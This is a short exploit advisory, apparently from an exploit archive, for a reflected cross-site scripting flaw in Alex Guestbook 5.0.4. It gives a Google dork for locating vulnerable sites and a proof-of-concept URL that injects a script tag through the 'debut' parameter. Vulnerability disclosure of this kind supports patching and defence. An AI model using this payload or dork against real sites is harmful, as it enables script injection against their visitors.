Alex Guestbook 5.0.4 Cross Site Scripting

Alex Guestbook version 5.0.4 suffers from a cross site scripting vulnerability.


MD5 | 86c098dbe0cc818ad9dcc6ee9692bf2c

# Exploit Title: Alex Guestbook Version 5.0.4 - Cross Site Scripting
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (Mojtaba Kazemi)
# Vendor Home : http://www.alexguestbook.net/
# Home : http://persian-team.ir/
# Google Dork : inurl:alex_guestbook3
# Telegram Channel: @PersianHackTeam
# Tested on: Linux
# Date: 2017-05-23

# POC :
# Cross Site Scripting :
# debut Parameter Vulnerable To XSS

http://www.server/alex_guestbook3/?debut=22237"><script>alert(/XSS/)</script>&mots_search=&lang=&skin=&seeAdd=&seeNotes=&seeMess=&test=

# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian White Hat Hackers

Related Posts